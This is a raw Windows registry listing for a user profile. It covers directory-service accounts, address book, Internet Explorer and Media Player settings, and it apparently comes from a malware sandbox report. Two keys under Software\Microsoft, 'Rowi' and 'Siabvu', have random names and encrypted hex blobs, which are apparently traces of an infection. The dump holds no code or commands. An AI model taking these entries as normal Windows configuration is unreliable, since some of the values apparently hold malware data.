HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager Default LDAP Account "Active Directory GC"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts PreConfigVer dword:00000004
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts PreConfigVerNTDS dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts ConnectionSettingsMigrated dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts AssociatedID hex:19,c7,7f,f0,eb,18,71,4b,81,0c,ca,d6,fc,92,08,57,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server ID dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC Account Name "Active Directory"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Server "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Authentication dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Simple Search dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Bind DN dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Port dword:00000cc4
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Resolve Flag dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Secure Connection dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP User Name "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC LDAP Search Base "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server ID dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot Account Name "Bigfoot Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Server "ldap.bigfoot.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP URL "http://www.bigfoot.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Authentication dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Simple Search dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,62,69,67,66,6f,6f,74,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server ID dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign Account Name "VeriSign Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Server "directory.verisign.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP URL "http://www.verisign.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Authentication dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Search Base "NULL"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Simple Search dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\VeriSign LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,76,65,72,69,73,69,67,6e,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server ID dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere Account Name "WhoWhere Internet Directory Service"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Server "ldap.whowhere.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP URL "http://www.whowhere.com"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Search Return dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Timeout dword:0000003c
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Authentication dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Simple Search dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere LDAP Logo hex(2):25,50,72,6f,67,72,61,6d,46,69,6c,65,73,25,5c,43,6f,6d,6d,6f,6e,20,46,69,6c,65,73,5c,53,65,72,76,69,63,65,73,5c,77,68,6f,77,68,65,72,65,2e,62,6d,70,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Rowi Xoywarsu hex:ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,da,81,20,17,73,ab,ee,51,52,94,51,12,67,6e,e8,7a,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,8a,c7,26,4a,74,cb,75,91,2d,a4,34,86,54,16,8b,30,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,ef,33,cf,1a,62,e1,3b,f9,9d,9e,0c,ab,71,fc,a5,d0,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Siabvu Vumyyfdol hex:8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,75,13,7f,ce,dc,8a,b9,4f,2f,3e,98,05,e5,54,e7,1e,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,8f,c7,50,bf,07,87,2a,4f,77,96,e1,71,4d,7e,e0,c0,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4 OlkContactRefresh dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4 OlkFolderRefresh dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4 FirstRun dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\WAB\WAB4\Wab File Name @ "C:\Documents and Settings\bomber\Application Data\Microsoft\Address Book\bomber.wab"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FriendlyName "Default MidiOut Device"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device CLSID "{07B65360-C445-11CE-AFDE-00AA006C14F4}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,01,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,38,00,00,00,48,00,00,00,6d,69,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{4EFE2452-168A-11D1-BC76-00C04FB9453B}\Default MidiOut Device MidiOutId dword:ffffffff
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FriendlyName "Default DirectSound Device"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device CLSID "{79376820-07D0-11CF-A24D-0020AFD79767}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device FilterData hex:02,00,00,00,00,00,80,00,01,00,00,00,00,00,00,00,30,70,69,33,02,00,00,00,00,00,00,00,08,00,00,00,00,00,00,00,00,00,00,00,30,74,79,33,00,00,00,00,a8,00,00,00,b8,00,00,00,31,74,79,33,00,00,00,00,a8,00,00,00,c8,00,00,00,32,74,79,33,00,00,00,00,a8,00,00,00,d8,00,00,00,33,74,79,33,00,00,00,00,a8,00,00,00,e8,00,00,00,34,74,79,33,00,00,00,00,a8,00,00,00,f8,00,00,00,35,74,79,33,00,00,00,00,a8,00,00,00,08,01,00,00,36,74,79,33,00,00,00,00,a8,00,00,00,18,01,00,00,37,74,79,33,00,00,00,00,a8,00,00,00,28,01,00,00,61,75,64,73,00,00,10,00,80,00,00,aa,00,38,9b,71,01,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,09,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,03,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,92,00,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,40,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,41,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,64,01,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,49,02,00,00,00,00,10,00,80,00,00,aa,00,38,9b,71,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\ActiveMovie\devenum\{E0F158E1-CB04-11D0-BD4E-00A0C911CE86}\Default DirectSound Device DSGuid "{00000000-0000-0000-0000-000000000000}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Privacy CleanCookies dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowClosedTabs dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\TabbedBrowsing NewTabPageShowActivities dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\CommandBar CompatibilityViewButtonBalloonCount dword:00000001 dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active {8CFA7582-04D2-11E2-A16C-08002765500A} dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\Internet Explorer\Recovery\Active {E4F1361D-04D0-11E2-A16B-08002765500A} dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9695AEF9-9D03-4671-8F2F-FF49D1BB01C4} AttemptedAutoRun dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{976ABECA-93F7-4d81-9187-2A6137829675}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{99DB05E3-F81E-4C8A-A252-F396306AB6FE}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9F9562EB-15B6-46C6-A7CB-0A66FC65130E}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{9FA014E3-076F-4865-A73C-117131B8E292}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{D5E49195-ED19-40fb-9EE0-E6625A808B77}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{E641D09E-E500-4c09-8260-F1CD7B902E9C}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{F24A1BC2-2331-4B91-8A13-5A549DA56E9D}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\UIPlugins\{FD981763-B6BB-4d51-9143-6D372A0ED56F}
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\MediaLibrarySettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Skins\res://wmploc/RT_TEXT/MainAppSkin.wsz Prefs "mute;False"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying InitFlags dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowHorizontalSeparator dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying ShowVerticalSeparator dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistWidth dword:000000ba
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying PlaylistHeight dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsWidth dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying SettingsHeight dword:00000087
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataWidth dword:000000ba
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying MetadataHeight dword:000000a0
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Tasks\NowPlaying CaptionsHeight dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Player\Settings Client ID "{43209BE6-BD53-40A7-9DD3-50364635A3E4}"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences AcceptedPrivacyStatement dword:00000000 dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences MetadataRetrieval dword:00000003
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences SendUserGUID hex:00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences SilentAcquisition dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UsageTracking dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences DisableMRU dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LaunchIndex dword:00000002
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences AppColorLimited dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences FirstRun dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences X "10"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Y "10"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Width "686"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Height "536"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Maximized "0"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Volume dword:00000032
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ModeShuffle dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ModeLoop dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Mute dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences Balance dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentEffectType "Battery"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentEffectPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences VideoZoom dword:00000064
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShrinkToFit dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowEffects dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowFullScreenPlaylist dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingQuickHide dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowTitles dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowCaptions dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingPlaylist dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingMetadata dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences NowPlayingSettings dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences VizAutoSelect dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayView "VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsView "EQView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataView "MediaInfoView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentDisplayPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentSettingsPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences CurrentMetadataPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserDisplayView "VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayView "VizView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsView "EQView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataView "MediaInfoView"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserDisplayPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPDisplayPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPSettingsPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPMetadataPreset dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPShowSettings dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences UserWMPShowMetadata dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences ShowAlbumArt dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences RandomFolderName "0009236B"
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LastPlaylist hex:00,00,00,00,43,00,3a,00,5c,00,44,00,6f,00,63,00,75,00,6d,00,65,00,6e,00,74,00,73,00,20,00,61,00,6e,00,64,00,20,00,53,00,65,00,74,00,74,00,69,00,6e,00,67,00,73,00,5c,00,62,00,6f,00,6d,00,62,00,65,00,72,00,5c,00,41,00,70,00,70,00,6c,00,69,00,63,00,61,00,74,00,69,00,6f,00,6e,00,20,00,44,00,61,00,74,00,61,00,5c,00,4d,00,69,00,63,00,72,00,6f,00,73,00,6f,00,66,00,74,00,5c,00,4d,00,65,00,64,00,69,00,61,00,20,00,50,00,6c,00,61,00,79,00,65,00,72,00,5c,00,30,00,30,00,30,00,39,00,32,00,33,00,36,00,42,00,2e,00,77,00,70,00,6c,00,00,00,
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LastPlaylistQuery ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences LastPlaylistIndex dword:00000000
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\EqualizerSettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyStyle dword:00000001
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyName ""
HKEY_USERS\S-1-5-21-484763869-706699826-1060284298-1003\Software\Microsoft\MediaPlayer\Preferences\ProxySettings\HTTP ProxyPort dword:00000050
